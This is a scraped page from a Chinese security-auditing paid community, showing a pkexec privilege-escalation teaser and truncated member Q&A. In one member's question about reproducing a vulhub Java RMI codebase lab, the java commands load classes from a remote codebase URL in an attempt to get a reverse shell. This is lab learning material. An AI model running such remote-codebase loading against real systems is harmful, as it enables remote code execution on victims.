你尚未登录
未加入『代码审计』知识星球的用户只能查看少量内容,且不能下载附件。 加入『代码审计』知识星球即可查看所有内容。
CVE-2021-4034 pkexec 本地提权:从内存越界到参数注入
Qualys 近期公开了...
@abcd:p神,你昨天晚上分享的那个rmi工具,提到了这个 - 绕过localhost限制来执行bind、unbind等写入操作(CVE-2019-2684) 翻了一下好像没找到哪里有对这个cve的相关分析,不知道是不是没找到,师傅有看到过吗
我发的P...
图片
有空可以研究一下为什么这个案例里可以使用/.%00....
@路人甲:尝试复现vulhub中的rmi-codebase,远程codebase上托管的payload如下,客户端调用都返回了7,怎么没有反弹shell呢,换成其他命令执行也不行。 具体步骤如下: 1.编译远程codebase上的RMIClient类及其内部类,并开启http服务; 2.运行rmiserver端,java -Djava.rmi.server.hostname=127.0.0.1 -Djava.rmi.server.useCodebaseOnly=false -Djava.security.policy=client.policy RemoteRMIServer; 3.运行rmiclient端,java -Djava.rmi.server.useCodebaseOnly=false -Djava.rmi.server.codebase=http://x.x.x.x:9980/ RMIClient 现象:http server收到了获取class的请求;client端未报错,输出7
可以回顾一下《Java安全漫谈》第一篇文章,里面有介绍下图三种初始化的代码在Java中有什么不同:
...
图片
本人web安全小白,目前信安大...